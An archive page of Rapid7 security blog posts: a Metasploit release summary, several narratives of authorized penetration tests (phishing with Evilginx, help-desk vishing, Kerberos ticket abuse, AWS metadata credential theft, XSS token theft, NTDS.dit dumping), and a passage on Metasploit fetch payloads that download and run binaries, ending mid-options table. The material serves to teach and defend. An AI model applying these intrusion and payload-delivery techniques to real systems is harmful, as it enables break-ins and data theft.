Tag Archives: penetration-testing

Metasploit Wrap-Up 12/8/2023

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2023/12/08/metasploit-wrap-up-12-8-2023/

Are You Looking for ACTION?

Metasploit Wrap-Up 12/8/2023

Our very own adfoster-r7 has added a new feature that adds module actions, targets, and aliases to the search feature in Metasploit Framework. As we continue to add modules with diverse goals or targets, we’ve found ourselves leaning on these flags more and more recently, and this change will help users better locate the modules that let them do what they want.

Metasploit Wrap-Up 12/8/2023

Right now, the feature is behind a feature flag as we work out how to make it as user-friendly as possible. If you would like to use it, turn on the feature by running features set hierarchical_search_table true. Please let us know how it works for you!

New module content (2)

ownCloud Phpinfo Reader

Authors: Christian Fischer, Ron Bowes, creacitysec, h00die, and random-robbie
Type: Auxiliary
Pull request: #18591 contributed by h00die
Path: gather/owncloud_phpinfo_reader

Description: This adds an auxiliary module for CVE-2023-49103 which can extract sensitive environment variables from ownCloud targets including ownCloud, DB, Redis, SMTP, and S3 credentials.

Docker cgroups Container Escape

Authors: Kevin Wang, T1erno, Yiqi Sun, and h00die
Type: Exploit
Pull request: #18578 contributed by h00die
Path: linux/local/docker_cgroup_escape

Description: This adds a new module to exploit CVE-2022-0492, a docker escape for root on the host OS.

Enhancements and features (5)

  • #17667 from h00die – Makes various performance and output readability improvements to Metasploit’s password cracking functionality. Now, hash types without a corresponding hash are skipped, invalid hashes are no longer output, cracking stops for a hash type when there’s no hashes left, and empty tables are no longer printed. Other code optimizations include added support for Hashcat username functionality, a new quiet option, and documentation updates to the wiki.
  • #18446 from zeroSteiner – This makes the DomainControllerRhost option optional, even when the authentication mode is set to Kerberos. It does so by looking up the Kerberos server using the SRV records that Active Directory publishes by default for the specified realm.
  • #18463 from h00die-gr3y – This updates the linux/upnp/dlink_upnp_msearch_exec exploit module to be more generic and adds an advanced detection logic (check method). The module leverages a command injection vulnerability that exists in multiple D-Link network products, allowing an attacker to inject arbitrary command to the UPnP via a crafted M-SEARCH packet. This also deprecates the modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi module, which uses the same attack vector and can be replaced by this updated module.
  • #18570 from adfoster-r7 – Updates Metasploit’s Docker ruby version from 3.0.x to 3.1.x.
  • #18581 from adfoster-r7 – Adds hierarchical search table support to Metasploit’s search command functionality. The search table now includes a module’s actions, targets, and alias metadata. This functionality requires the user to opt-in with the command features set hierarchical_search_table true.

Bugs fixed (1)

  • #18603 from h00die – Updates the auxiliary/scanner/snmp/snmp_enum and auxiliary/scanner/snmp/snmp_login module metadata to include metadata references to CVE-1999-0516 (guessable SNMP community string) and CVE-1999-0517 (default/null/missing SNMP community string).

Documentation added (1)

  • #18592 from loredous – Fixes a typo in the SMB pentesting documentation.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

PenTales: What It’s Like on the Red Team

Post Syndicated from Aaron Herndon original https://blog.rapid7.com/2023/08/31/pentales-what-its-like-on-the-red-team/

PenTales: What It’s Like on the Red Team

At Rapid7 we love a good pen test story. So often they show the cleverness, skill, resilience, and dedication to our customer’s security that can only come from actively trying to break it! In this series, we’re sharing some of our favorite tales from the pen test desk and hopefully highlight some ways you can improve your own organization’s security.

Performing a Red Team exercise at Rapid7 is a rollercoaster of emotions. The first week starts off with excitement and optimism, as you have a whole new client environment to dig into. All assets and employees are in-scope, no punches held. From a hacker mentality, it’s truly exciting to be unleashed with unlimited possibilities bouncing around in your head of how you’ll breach the perimeter, set persistence, laterally move, and access the company “crown jewels.”

Then the first week comes to a close and you’ve realized this company has locked down their assets, and short of developing and deploying a 0-day, you’re going to have to turn to other methods of entry such as social engineering. Excitement dies down but optimism remains, until that first phish is immediately burned. Then the second falls flat. Desperation to “win” kicks in and you find yourself working through the night, trying to find one seemingly non-existent issue in their network, all in the name of just getting that first foothold.

One of our recent Red Teams followed this emotional roller-coaster to a ‘T’. We were tasked with compromising a software development company with the end goal of obtaining access to their code repositories and cloud infrastructure. We had four weeks, two Rapid7 pen test consultants and a lot of Red Bull to hack all the things at our disposal. We spent the first two days performing Open Source Intelligence (OSINT) gathering. This phase was a method of passive reconnaissance, in which we scoured the internet for publicly accessible information about our target company. Areas of interest included public network ranges owned by the company, domain names, recent acquisitions, technologies used within the company, and employee contact information.

Our OSINT revealed that the company was cloud-first with a limited external footprint. They had a few HTTPS services with APIs for their customers, software download portals, customer ticketing systems, the usual. Email was cloud hosted in Office365 with Single Sign-On (SSO) handled through Okta. The only external employee resources were an Extranet page that required authentication, a VPN portal which required Multi-Factor Authentication (MFA) and a certificate, email cloud hosted in Office365, and Okta to handle Single Sign-On (SSO) with MFA.

After initial reconnaissance, we determined three possible points of entry: compromise one of the API endpoints, phish a user with a payload or MFA bypass, or guess a password and hope it can sign into something without MFA required. We spent our first two days combing over the customer’s product API documentation and testing for any endpoints which could be accessed without authentication or exploited to gain useful information. We were stonewalled here — kudos to the company.

Gone Phishin’

Our optimism and excitement was still high, however, as we set our eyes on plan B, phishing employees. We whipped up a basic phishing campaign that masqueraded as a new third-party employee compliance training portal. To bypass web content filtering, we purchased a recently expired domain that was categorized as “information/technology.” We then created a fake landing page with our new company logo and a “sign in with SSO” button.

Little did the employees realize, while they saw their normal Okta login page, it was a proxy-phishing page using Evilginx that would capture their credentials and authenticated Okta session. The only noticeable difference was the URL. After capturing the employee’s Okta session we redirected them back to our fake third-party compliance platform, where they were requested to download an HTML Application (HTA) file containing our payload.

We fired off this phishing campaign to 50 employee email addresses discovered online, ensuring that anyone with “information security” in their title was removed from the target list. Then we waited. One hour went by. Two. Three. No interactions with the campaign. The dread was starting to sit in. We suspected that a day of hard work to build the entire campaign was eaten by a spam filter, or worse, identified and the domain was instantly blocked.

With defeat looming, we began preparing a second phishing campaign, when all of the sudden our TMUX session with Evilginx running showed a blob of green text. A valid credential was captured as well as an Okta session token. We held our breath as we switched to our Command and Control (C2) server dashboard, fingers crossed, and there it was. A callback from the phished user’s workstation. They opened the HTA on their workstation. It bypassed the EDR solution and executed our payload. We were in.

The thrill of establishing initial access is exhilarating. However, it’s at this moment that we have to take a deep breath and focus. Initial access by phishing is a fragile thing, if the user reports it, we’ll lose our shell. If we trip an alert within the EDR, we’ll lose our shell. If the user goes home for the night and restarts their computer before we can set persistence, we’ll lose our shell.

First things first, we quickly replaced our HTA payload on the phishing page with something benign in case the campaign was reported and the Security Operations Center (SOC) triaged the landing page. We can’t have them pulling Indicators of Compromise (IoCs) out of our payload and associating it with our initial access host in their environment. From here, one operator focused on setting persistence and identifying a lateral movement path while the other operator used stolen Okta session tokens to review the user’s cloud applications before it expired. Three hours in and we still had access, reconnaissance was underway, and we had identified a few juicy Kerberoastable service accounts that if cracked would allow lateral movement.

Things were going our way. And then it all came crashing down.

At what felt like a crescendo of success, we received another successful phish with credentials. We cracked the service account password that we had Kerberoasted, and… lost our initial access shell.  Looking in the employee’s Teams messages, we saw messages from the SOC asking about suspicious activity on their asset as they prepared to quarantine it. Deflated and tired, back to the drawing board we went. But, like all rollercoasters, we started going back uphill when we realized the most recent credentials captured were for an intern on the help desk team. While the tier one help desk employee didn’t have much access in the company, they could view all available employee support tickets in the SaaS ticketing solution. Smiling ear to ear, we assumed our role as the helpful company IT helpdesk.

Hi, We’re Here to Help

We quickly crafted a payload that utilized legitimate Microsoft binaries packaged alongside our malicious DLL, loaded in via AppDomain injection, and packaged nicely into an ISO. We then identified an employee who had submitted a ticket to the help desk asking for assistance with connecting to an internal application which was throwing an error. Taking a deep breath, we spoofed the help desk phone number and called the employee in need of assistance.

“Hi ma’am, this is Arthur from the IT help desk. We received your ticket regarding not being able to connect to the portal, and would like to troubleshoot it with you. Is this a good time?”

Note: you might be wondering what the employee could have done better here, but in the end, the responsibility lay with the company not having multi-factor on their help desk portal. It gave us the information we needed to answer any question the employee could ask, as the help desk.

The employee was thrilled to get assistance so quickly from the help desk. We even went the extra mile and spent time trying to troubleshoot the actual issue with the employee, receiving thanks for our efforts. Finally, we asked the employee to try applying “one last update” that may resolve the issue. We directed them to go to a website hosting our payload, download the ISO, open it, and run the “installer.” They obliged, as we had already built rapport throughout the entire call. Moments later, we had a shell on the employee’s workstation.

With a shell, cracked service account credentials, and all the noisy reconnaissance out of the way from our first shell, we dove right into the lateral movement. The service account allowed  us to access an MSSQL server as an admin. We mounted the C$ drive of the server and identified already installed programs which utilized Microsoft’s .NET framework. We uploaded a malicious DLL and configuration file and remotely executed the installed program using Windows Management Instrumentation (WMI), again utilizing AppDomain injection to load our DLL. Success! We received a callback to our new C2 domain from the MSSQL server. Lateral movement hop number one, complete.

Using Rubeus, we checked for Kerberos tickets in memory and discovered a Kerberos Ticket Granting Ticket (KRBTGT) cached for a Domain Admin user. The KRBTGT could be used in a Pass-the-Ticket (PTT) attack to authenticate as the account, which meant we had Domain Admin access until the ticket expired in approximately four more hours. Everything was flowing  and we were ready for our next setback. But it didn’t come. Instead, we used the ticket to authenticate to the workstation of a cloud administrator employee and establish yet another shell on the host. Luckily for us, the company had everyone’s roles and titles in their Active Directory descriptions, and employee workstations also contained the associated employee name in the description field, which made identifying the cloud admin employee’s workstation a breeze.

Using our shell on the cloud administrator’s workstation, we executed our own Chrome cookie extractor, “HomemadeChocolateChips,” in memory, which spawned Chrome with a debug port and extracted all cookies from the current user’s profile. This provided us with an Okta session token, which we used in conjunction with a SOCKS proxy through the employee’s machine to access their Okta dashboard sourced from an internal IP address. The company had it configured such that once authenticated to Okta, if coming from the company’s IP space, the Azure Okta chiclet did not prompt for MFA again. With a squeal of excitement, we were into their Azure Portal with admin privileges.

In Azure, there is a handy feature under a virtual machine’s configuration and operations tab called “Run Command.” This allows an administrator to do just as it states, run a PowerShell script on the virtual machine. As if it couldn’t get any easier, we identified a virtual machine labeled “Jenkins Build Server” with “Run Command” enabled. After running a quick PowerShell script to download our zip file with backdoored legitimate binaries, expand the archive, and then execute them, we established a C2 foothold on the build server. From there we found GitHub credentials utilized by build jobs, which let us access our objective: source code for company applications.

Exhausted but triumphant, with bags under our eyes and shaking from the caffeine induced energy, we set up a few long-haul C2 connections to maintain persistent network access through the end of the assessment. We also met with the client to determine our next steps, such as intentionally alerting their security team to the breach. Well, after a good beer and nap over the weekend, that is.

The preceding story was an amalgamation of several recent attack workflows to obfuscate client identity and showcase one cohesive assessment.

PenTales: A Badge, a Tag, and a Bunch of Unattended Chemicals; Why Physical Social Engineering Engagements are an Important Part of Security

Post Syndicated from Bennett Gogarty original https://blog.rapid7.com/2023/08/03/a-badge-a-tag-and-a-bunch-of-unattended-chemicals-why-physical-social-engineering-engagements-are-an-important-part-of-security/

PenTales: A Badge, a Tag, and a Bunch of Unattended Chemicals; Why Physical Social Engineering Engagements are an Important Part of Security

At Rapid7 we love a good pen test story. So often they show the cleverness, skill, resilience, and dedication to our customer’s security that can only come from actively trying to break it! In this series, we’re going to share some of our favorite tales from the pen test desk and hopefully highlight some ways you can improve your own organization’s security.

Rapid7 was tasked with performing a physical social engineering engagement for a pharmaceutical company. Physical social engineering penetration tests involve actually entering the physical space of the target. In this case, we were able to enter the facility via tailgating behind an unsuspecting employee.

After gaining access inside the client’s office space, I traversed multiple floors without having a valid RFID badge thanks to even more tailgating and unassuming employees. When I reached an unattended conference room, I was able to plug a laptop into the network due to lack of network access controls. I employed a tool called ‘Responder.py’ to perform Man-in-the-Middle (MitM) attacks by poisoning LLMNR/NBNS requests. This allowed me to gather usernames and password hashes for multiple employees, as well as perform ‘relay’ attacks. The password hashes were then placed on a password cracking server to let the relay attempts run for a bit before I exited the conference room to identify additional points of interest for the assessment. I was able to exit the building that first day without ever being stopped or questioned by anyone.

Upon my return the following day, I again tailgated into the facilities and returned to the same conference room to check the status of the password cracking attempts; only to discover that none of the hashes were cracked. Obviously with more time and additional password cracking attempts the results may have been different. Having been unsuccessful at this first attempt I looked around for other ‘quick wins’ such as missing critical patches but was unable to discover any attack paths that way.

While performing network testing, I noticed an employee hovering around outside the conference room door only to quickly disappear after being seen. I continued testing for another few minutes before noticing the same employee nearby. While I was unable to ascertain the reasoning for this employee’s presence, to avoid being compromised, I packed up my equipment and exited the conference room to focus on other goals that were prioritized over network testing.

Entering the Laboratory

Part of our task from the client was to see if I could gain access to multiple biology labs that stored several dangerous chemicals as well as expensive testing equipment. Turns out, it wasn’t terribly difficult. The first lab was completely unattended and I was able to enter thanks to a door that was not fully closed. The second lab was accessed compliments of a significant gap between the door’s plunger and strike plate, which allowed me to use my hotel room key to shim the door open. This gave me access to more dangerous (and dangerously unattended) chemicals. I then accessed the 5th floor labs through even more tailgating and unassuming employees. The 5th floor labs actually had people in them but nobody stopped and questioned me, a complete stranger. This pen test really highlights the benefits of Security Awareness Training and physical social engineering engagements!

The Boss’ Office

The final demonstration of impact came when the point-of-contact for the engagement asked if we could enter at least one of a few executives’ offices and leave a message on their dry erase board stating ‘I was here – A Pentester.’ After a little while, I got my chance to tag an executive’s office to really help demonstrate the impact/importance of security of all kinds, not just your network.

While making our way through our client’s office spaces on the last day, I was finally stopped and questioned. I informed this gentleman that I was working with [Point-of-Contact’s Name] performing a wireless survey of their networks. He informed me that he knew I worked for their company because I had a badge. Their badges did not contain their picture or any other information, it was totally blank. My badge was blank too (Pro Tip: don’t assume someone works there based on a blank RFID badge). I told this fella that it was good that he stopped and questioned me because you never know who somebody is or if they are who they say they are. He completely agreed, shook my hand and told me to have a nice day.

Few things highlight the need for robust employee security training more than a successful physical social engineering pen test. Ensuring your workforce is thinking critically about security goes beyond the ability to sniff out a phishing email and into securing the physical space they occupy. A good security plan is essential lest you be visited by a clandestine attacker.

Check us out at this year’s Black Hat USA in Las Vegas! Our experts will be giving talks and our booth will be staffed with many members of our team. Stop by and say hi

PenTales: There Are Many Ways to Infiltrate the Cloud

Post Syndicated from Arvind Vishwakarma original https://blog.rapid7.com/2023/07/27/pentales-there-are-many-ways-to-infiltrate-the-cloud/

PenTales: There Are Many Ways to Infiltrate the Cloud

At Rapid7 we love a good pen test story. So often they show the cleverness, skill, resilience, and dedication to our customer’s security that can only come from actively trying to break it! In this series, we’re going to share some of our favorite tales from the pen test desk and hopefully highlight some ways you can improve your own organization’s security.

Rapid7 was engaged to do an AWS cloud ecosystem pentest for a large insurance group. The test included looking at internal and external assets, the AWS cloud platform itself, and a configuration scan of their AWS infrastructure to uncover gaps based on NIST’s best practices guide.

I evaluated their external assets but most of the IPs were configured to block unauthorized access. I continued to test but did not gain access to any of the external assets since, with cloud, once access has been blocked from the platform itself there is not a lot that I could do about it. But nevertheless, I continued to probe for cloud resources, namely S3 buckets, AWS Apps etc., using company-based keywords. For example: companyx, companyx.IT, companyx.media, etc.  Eventually, I found S3 buckets that were publicly available on their external network. These buckets contained sensitive information which definitely was a point of action for the client.

My next step was to complete a configuration scan of their AWS network, which provided complete visibility into their cloud infrastructure, including the resources that were running, the roles attached to the resources, the open services, etc. It also provided the customer valuable insights on the security controls that were missing based on the NIST’s best practices guide like the list of unused access keys, unencrypted disk volumes, keys that are not rotated every 90 days, insufficient logging, publicly accessible services like SSH, RDP, and many more. This scan was done using Rapid7’s very own InsightCloudSec tool which provides customers visibility into their cloud network and helps them identify gaps.

When testing the AWS cloud platform with the read-only credentials provided by the customer, I found they were locked with a strong IAM policy which allowed viewing of only cloud resources on the platform. However, there were no weaknesses in the IAM policy after attempts to enumerate vulnerabilities. This will be important later on!

Hardcoded credentials were found in Functions Apps and EC2 instance data but I was unable to utilize this further to escalate privileges. After enumerating the S3 buckets using the read-only credentials multiple S3 buckets containing customer invoices and payment data, along with Infrastructure-as-a-code files were found.  This provided information about how the customer managed their automated deployments. Beyond this, we were unable to find any vulnerabilities to escalate privileges, however, all the data accumulated during the phase was kept handy in case there would be a chance to chain vulnerabilities together and gain access during the next phases of the pentest. Although it was frustrating to not be able to find any ways to escalate privileges from the platform itself, enumerating it gave me plenty of understanding about their environment which would prove useful in the next phase.

In the final phase of the test, I tested all of the internal assets that were in-scope. These were primarily windows servers on EC2 instances hosting different kinds of services and applications. I enumerated the Active Directory Domain controllers on these servers and found that some AD servers allowed for NULL session enumeration which means you could connect to the AD server and dump out all of the domain information like users, groups, and password policies, without authentication.

Password spray attacks were deployed after all the users from the Domain were accessed. Pretty quickly, it was clear there were multiple users using weak passwords like Summer2023, Winter23, or Password1. Many accounts were even sharing the same passwords! This provided plenty of compromised credentials allowing me to go through the access levels provided to these compromised accounts. I found one account with Domain Admin access and dumped the NTDS.dit file from the AD Servers which contained hashes for all the domain users. With this, several accounts with weak passwords were cracked.

With access to multiple accounts in the bag, the only goal left was to gain some sort of access on the AWS platform. With all the data gathered from the AWS cloud platform test, I first looked at the EC2 Instances on the platform and what roles were assigned to each of them. Then I assessed accounts which had admin access. I found an ‘xx-main-ec2-prod’ role attached to an EC2 instance for which I had admin access through one of the compromised accounts. Using RDP to login to the EC2 instance, I pinged the IAM meta-data server and got the temporary AWS credentials for the ‘xx-main-ec2-prod’ role.

With these credentials, I created a new AWS profile and enumerated the permissions associated with this role. The ‘xx-main-ec2-prod’ role had access to list secrets in the AWS account, put and delete objects on all S3 buckets, send OS commands to all EC2 instances in the AWS account, and modify logs, as well. I proceeded to list some secrets in the AWS account to confirm the access that we had gained. With this level of access, I was able to show the client how an attacker could escalate privileges on their AWS platform.

In the end, this testing highlights how vast the attack surface would be on the cloud network. Even if you’ve locked down your cloud platform, the infrastructure assets could be vulnerable allowing attackers to compromise them and then laterally move to the cloud network. As organizations move their networks to the cloud, it would be important for them not to simply depend on the cloud platform to secure their network but also ensure that their individual assets are continuously tested and secured.

Check us out at this year’s Black Hat USA in Las Vegas! Our experts will be giving talks and our booth will be staffed with many members of our team. Stop by and say hi.

PenTales: Testing Security Health for a Healthcare Company

Post Syndicated from Aaron Tennison original https://blog.rapid7.com/2023/07/20/pentales-testing-security-health-for-a-healthcare-company/

PenTales: Testing Security Health for a Healthcare Company

At Rapid7 we love a good pen test story. So often they show the cleverness, skill, resilience, and dedication to our customer’s security that can only come from actively trying to break it! In this series, we’re going to share some of our favorite tales from the pen test desk and hopefully highlight some ways you can improve your own organization’s security.

Rapid7 was tasked with testing a provider website in the healthcare industry. Providers had the ability on the website to apply for jobs, manage time cards, connect with employers needing help at hospitals, apply for contracts, as well as manage certificates and documents that were needed to perform duties. The provider website was interested to see if their web application had any flaws that could be leveraged as an attacker, as the application was heavily customized.

I began by testing input fields for any vulnerabilities. If an input field does not sanitize user input correctly this could open the web application for potential attacks that allow an attacker to inject code. The vulnerable form with injected code could then be used to attack the web application or target users. An input field can be anything that allows you to enter information into the web application, like your name or email address. I discovered a field that was not correctly sanitizing input and when submitted, was viewed by accounts with administrative access.

Using the leverage gained from the vulnerable field I was able to perform a Cross Site Scripting (XSS) attack which stores JavaScript in a vulnerable form and returns the JavaScript to users. When a user views a vulnerable form with injected code, the code is executed inside the victim’s browser. An XSS payload was created that, when viewed by users, sent a refresh token to a server under our control. This allowed us to collect administrative tokens for accounts that viewed the vulnerable form, resulting in account takeovers. I also discovered that the refresh token was misconfigured and allowed indefinite access to the web application once obtained. With said refresh token in hand I could log in to the account indefinitely even if the password was changed.

I then turned my attention to authorization issues on the web application. As a non-privileged user, I discovered a dashboard that allowed providers to view expiring documents. The request was vulnerable to Broken Object-Level Authorization and Insecure Direct Object Reference (IDOR). so I was able to manipulate the request to access streams of all uploaded documents for all end users with accounts on the web applications. These documents included all healthcare documents uploaded to the application including background checks, Social Security information, addresses, physician documents, and more.

Further analysis of the application showed that unprivileged users could access calls that were being utilized by administrative users. These calls disclosed sensitive information including usernames and passwords for vendors and staff associated with contracted hospitals on the application. As a non-privileged user account, I utilized this authorization issue in combination with an IDOR vulnerability to scrape usernames and passwords from the vulnerable endpoint for over 15,000 accounts in minutes.

Chasing a hunch that there would be more misconfigurations to exploit, I discovered that candidates for hospital positions at multiple locations had cleartext Social Security numbers stored in an administrative portion of the web application. An API endpoint was used to retrieve the information, and the endpoint was vulnerable to IDOR. I performed a brute force attack to retrieve names and cleartext Social Security numbers from hundreds of accounts being stored in the application.

This test highlighted some issues present in a large amount of web applications. We demonstrated just how quickly adversaries could exfiltrate sensitive data from an application that did not have safeguards in place. We also demonstrated just how important ensuring user input is sanitized correctly in an application and how failing to do so correctly can put users and the company at risk. Ensuring users are isolated and authorization is implemented appropriately is another major factor to consider when operating in the healthcare industry, as protecting client data is critical when dealing with protected health information and personally identifiable information.

The client was shocked at the results of testing the security of the application. The test disclosed some serious vulnerabilities that were not previously discovered by past testing from other security vendors, highlighting the importance of continuous testing especially for a customized application that was constantly evolving.

Check us out at this year’s Black Hat USA in Las Vegas! Our experts will be giving talks and our booth will be staffed with many members of our team. Stop by and say hi.

Pentales: Old Vulns, New Tricks

Post Syndicated from Austin Guidry original https://blog.rapid7.com/2023/07/13/pentales-old-vulns-new-tricks/

Pentales: Old Vulns, New Tricks

At Rapid7 we love a good pentest story. So often they show the cleverness, skill, resilience, and dedication to our customer’s security that can only come from actively trying to break it! In this series, we’re going to share some of our favorite tales from the pen test desk and hopefully highlight some ways you can improve your own organization’s security.

This engagement began like any other Internal Network Penetration test. I followed a systematic methodology to enumerate the internal domain. The target organization was a financial institution, but their internal domain was administered via Active Directory (AD) like most organizations with more than a handful of computers. AD is a Microsoft product that provides centralized control of the whole gamut of networking devices that an organization may have. This may include workstations, servers, switches, routers, printers, and IoT devices. Additionally, AD can be used for localized, global, or cloud-based networks.

After enumeration, I identified high value targets and a wide range of open ports and services. I used a Metasploit RC file containing instructions and settings to configure Metasploit modules. This allowed me to scan the open ports and services for common/default credentials, vulnerabilities, misconfigurations, software types, version numbers, and other accessible information in the background while I covered more ground manually.

I began operations to understand the state of several types of combinable networking vulnerabilities, checking for broadcast name services (BNS) and poisoning capabilities, Server Message Block (SMB) Signing statuses for hosts using SMB visible to my attack box (PTK), and for Internet Protocol version 6 (IPv6) traffic. These are some of the more common ways to begin a successful attack path. I checked all of these options on this organization’s network, but I found that I could not leverage BNS poisoning, SMB Signing not required, or IPv6-based attacks.

Luckily, the Metasploit RC file found default credentials for Intelligent Platform Management Interface (IPMI) assets. The IPMI protocol’s design introduced a vulnerability that provides a hash to someone attempting authentication. A user would attempt to authenticate with a specific username, and the IPMI device would provide the hash for that account. The Metasploit module for dumping IPMI hashes does this exactly for a wordlist full of common usernames and checks the provided hashes against a partial rainbow table of common passwords like “admin” and “root.” In this case, several devices were using credentials such as “admin:admin” and “root:root.”

This is exciting because IPMI is used to control servers, and more often these days server virtualization is such that several server virtual machines (VMs) are hosted on one physical server computer. I logged into the web interfaces associated with these IPMIs and found within the remote consoles that three of these IPMI assets were hosting VMware ESXi instances. VMware ESXi is, in fact, used to host and manage multiple VMs. The remote consoles provided the IP and website addresses for the VMware ESXi administrative login interfaces. I navigated to these interfaces and typed in the default credentials used on the IPMI hosts… and they were valid!

At this point, I was quite shocked that default credentials were in use, some 4+ decades after “admin:admin” became an official vulnerability. Not to mention, default credentials to valuable assets is probably the simplest and easiest vulnerability to exploit.

So, I got into the VMware ESXi consoles and I quickly identified which of the three assets contained the primary Domain Controller (DC) and Exchange Server. As an administrator to the VMware ESXi console, I had a lot of flexibility in what I was able to do with the virtual machines. First, I checked to see if there were sessions still open with these two assets. Both were locked and would require valid credentials to access via (Remote Desktop Protocol) RDP or similar remote access control.

I could conduct other attacks such as Denial of Service (DoS), deleting the machine or turning it off, but this would immediately be noticed by organization personnel, and most importantly these types of attacks were out of scope. DoS is out of scope for pentesters by default. This type of attack is extremely harmful to business operations, and has the potential to cause irreversible harm.

I needed to find an interface with which I had administrative control to view data on these VMs vs. trying to use the underlying Operating Systems (OS) within the VMs. I tried to download the VMs, but they would have taken 10 + days for the DC and multiple weeks for the Exchange Server. I tried to create a snapshot of the memory of the DC to attempt to filter credentials from it, but this was also too large and I could not acquire the file during the engagement.

I asked for help from the consulting team. At Rapid7, we have a deep bench of talented and knowledgeable people and a healthy culture of teamwork and support.

One of my teammates hopped on a call to help me investigate the potential options. Upon further review of the accessible ports and services in use by the VMware ESXi host, we found that Secure Shell (SSH) was open and accessible. There is a tool called SSHFS, which stands for SSH File System. This tool uses an SSH connection to mount and interact with the files on a remote device. This is similar to Network File Share (NFS) where a user can create a directory and mount it to the directory of a remote device. With administrative credentials to the VMware ESXi device, this provided me administrative control over the remote system’s file system and allowed me to interact with it in the same way as local files.

From here, I simply navigated to the directory within the DC that contained the NTDS.DIT file. This file is present on all Windows hosts, however, when it is contained by a Domain Controller this file contains all of the New Technology LAN Manager (NTLM) hashes for all of the accounts on the domain, including users, workstation machine accounts, and service accounts.

Sometimes, for environments that have or once had devices older than Windows Vista or Server 2008, there are also LM hashes which are incredibly weak. The entire keyspace for LM can be cracked in minutes to hours depending on the hardware, and the entire 8 character keyspace for NTLM can be cracked within several hours on enterprise-grade hardware.

This does not even cover the most valuable feature of NTLM authentication. NTLM hashes can be used as passwords, making it irrelevant to know the cleartext password that created the hash. This is called a “pass-the-hash” attack. Upon successfully dumping the NTDS.DIT file for the organization’s domain, I now controlled every domain-joined account and device.

With this control, I switched gears to post-exploitation and demonstrating impact for the organization’s stakeholders. I logged into several email accounts, looking for and finding sensitive information such as Social Security Numbers (SSNs) and Account Numbers. I sent emails from organizational personnel’s email accounts to the point-of-contact and myself, demonstrating the impersonation potential. I used cracked account credentials to locate accounts for which Multi-factor Authentication (MFA) had not been configured and enrolled in MFA for one account. I perused several organization-wide network file share servers finding sensitive documents, PII, account numbers, bank and loan statements, and network information. I found multiple PDFs identifying the organization’s ATMs, their names, locations, makes and models, support information from supporting third-parties, and IP addresses.

I used these ATM IP addresses to conduct additional enumeration attempting to discover attack paths to gain control of ATMs. I found several open ports but was unable to gain access or control to the ATMs. However, within the directories containing ATM information were Excel spreadsheet logs of ATM activity. These non-password-protected spreadsheets held cardholder data, their links to bank customer account numbers, and historical information such as timestamps, locations, transaction amounts, and transaction types.

The customer’s environment had a lot of time and effort dedicated to security, and the security team covered many of the “low-hanging-fruit.” Sometimes older technology like IPMI is necessary for business. It is vital to understand the risks and to work with the technology we have to secure it against well-documented attacks. Why allow anyone internally to see an administrative resource? Access controls and closing unnecessary ports could minimize the attack surface on exploitable systems. Finally, one of the best defenses continues to be a strong, unique password for all logins, local or domain.

We, the pentesters at Rapid7 put our experience and knowledge together to reveal the weaknesses in the customer’s environment and give them the opportunities to fix them. Sometimes hacking is like finding a needle in the haystack, but we hackers have automated needle-finding, haystack-searching machines. Do your research, do the best you can, and when in doubt, get a pentest!

Check us out at this year’s Black Hat USA in Las Vegas! Our experts will be giving talks and our booth will be staffed with many members of our team. Stop by and say hi.

Fetch Payloads: A Shorter Path from Command Injection to Metasploit Session

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2023/05/25/fetch-payloads-a-shorter-path-from-command-injection-to-metasploit-session/

Fetch Payloads: A Shorter Path from Command Injection to Metasploit Session

Over the last year, two-thirds of the exploit modules added to Metasploit Framework have targeted command injection vulnerabilities (CWE-94: Improper Control of Generation of Code). In the process of helping new and existing open-source contributors learn how to use Metasploit’s command stager toolset, we’ve recognized that while they’re powerful, command stagers have a high learning curve.

So, we added a new type of payload to help contributors move as quickly as possible from vulnerability to module and users to have more control over the commands executed. We’re pleased to announce the availability of fetch payloads, which simplify and replace some of the command stager use cases, providing for faster, more intuitive command injection module development and offering a useful new on-the-fly hacking tool.

Fetch payloads are command-based payloads that leverage network-enabled commands (cURL, certutil, ftp, tftp, wget ) on remote targets to transfer and execute binary payloads quickly and easily. Previously, some of the functionality of fetch payloads could be accomplished within an exploit module by using command stagers, but fetch payloads give greater flexibility for staging payloads with network-based commands and allow command staging of payloads independently from Metasploit modules.

Command stagers are still the correct choice for staging payloads through commands that do not use networking, like echo or printf, but otherwise, we encourage you to check out fetch payloads when you write your next command injection module—or the next time you need to upload and execute a payload when you already have a shell on a target. You may have performed this manually in the past using Python’s built-in HTTP server, msfvenom, and Metasploit Framework. Now we do it all for you.

Fetch payloads have two core use cases: gaining a Metasploit session from a shell and embedded in command injection exploit modules. We explore both in more detail below.

Using Fetch Payloads Manually From A Shell

In this use case, we will upgrade a shell on a host (any shell, not just a Metasploit Framework shell) to a Metasploit session.

The shell session:

tmoose@ubuntu:~/rapid7/metasploit-framework$ nc -lv 10.5.135.201 4585
Listening on ubuntu 4585
Connection received on 10.5.134.167 64613
Microsoft Windows [Version 10.0.17134.1]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\msfuser\Downloads>

Now, hop over to a Metasploit Framework instance reachable by that host and set up a fetch payload. You’ll need to decide five things:

The protocol you want to use (HTTP, HTTPS, and TFTP are currently supported)
The binary Metasploit payload you want to deliver
The command you want to use on the remote host to download the payload
The IP:PORT you want to use to serve the binary payload
The IP:PORT you want the binary payload to use

The first two items above determine the fetch payload we want to use: we are using cmd/windows/http/x64/meterpreter/reverse_tcp which will host a windows/x64/meterpreter/reverse_tcp binary payload on an HTTP server. We’re almost halfway done just by selecting the payload!

You can visualize the fetch payload names like this:

Command payload Platform Networking Protocol Underlying payload
cmd/ windows/ http/ x64/meterpreter/reverse_tcp

The other three values are set as options within the payload. We will use the default ports and leave the default command as the cURL command, so we just need to set LHOST for the payload to call back and FETCH_SRVHOST to tell the command where to call back and Framework where to host the payload:

msf6 payload(cmd/windows/http/x64/meterpreter/reverse_tcp) > show options

Module options (payload/cmd/windows/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
